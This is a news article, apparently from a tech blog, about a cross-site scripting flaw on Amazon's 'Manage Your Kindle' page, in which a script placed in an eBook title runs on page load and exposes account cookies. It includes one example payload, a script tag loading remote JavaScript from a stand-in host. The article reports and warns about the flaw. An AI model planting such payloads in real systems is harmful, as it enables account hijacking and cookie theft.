Title: Alert! Malicious eBooks Can Exploit Kindle’s Security Flaw
While Amazon seems to be free from security concerns at Audible, they apparently harbor a serious vulnerability on their main website which puts Kindle users at risk.
A vigilant security researcher brought to our attention a significant security loophole on Amazon’s “Manage Your Kindle” page. Upon our investigation, we were able to independently confirm this claim. Thankfully, this is a problem that the company could address relatively easily.
The point of vulnerability lies in Kindle’s susceptibility to hacker activity, with the hacker gaining access to a user’s Amazon account without much effort. All it takes is for the victims to download an eBook manipulated by the hacker to include a specific script in the title.
To illustrate this with an example, if an attacker releases an eBook with a title like ‘<script src=”https://www.example.org/script.js”></script>’, the code within will be executed as soon as the victim opens the Kindle Library web page. This results in the immediate compromise of Amazon account cookies which can then be accessed by and transferred to the attacker. Consequently, the victim’s Amazon account is left entirely vulnerable.
I personally tested this claim, and unfortunately, it does work. The aftermath resembled closely the image accompanying the hacker’s blog post. Given this situation, I would urge users to be extremely cautious when buying or downloading eBooks from sources that don’t inspire trust – at least until Amazon resolves this issue. I believe Amazon will take prompt action soon given their track record of fixing a similar problem when it surfaced last fall. In the interest of full disclosure, this issue isn’t entirely new but is only gaining traction now. The German eBook blog AlleseBook.de broke the story earlier today when they shed light on the hacker who discovered this issue and provided an eBook proving the hack worked. According to the investigator Benjamin Daniel Mussler, Amazon was alerted about this security breach last October and resolved it promptly four days after being informed. However, the company appears to have reintroduced the security flaw this year with the launch of the updated “Manage Your Kindle” page. As I write this, Mussler’s hack is still operational, as evidenced by an eBook available for testing the potential harm. However, I strongly advise against this as troubleshooting should be left to professionals. In these uncertain online times, there is one universal rule to ensure personal safety: steer clear of downloading apps from questionable websites. This rule applies equally to Epub eBooks, PDFs containing Javascript or entire apps, and now Kindle eBooks as well. Source: Digital Reader This article was updated in 2025 to reflect modern realities. [UPDATED_TB_2025] Subscribe to get the latest posts sent to your email.
Related Posts:
Discover more from TechBooky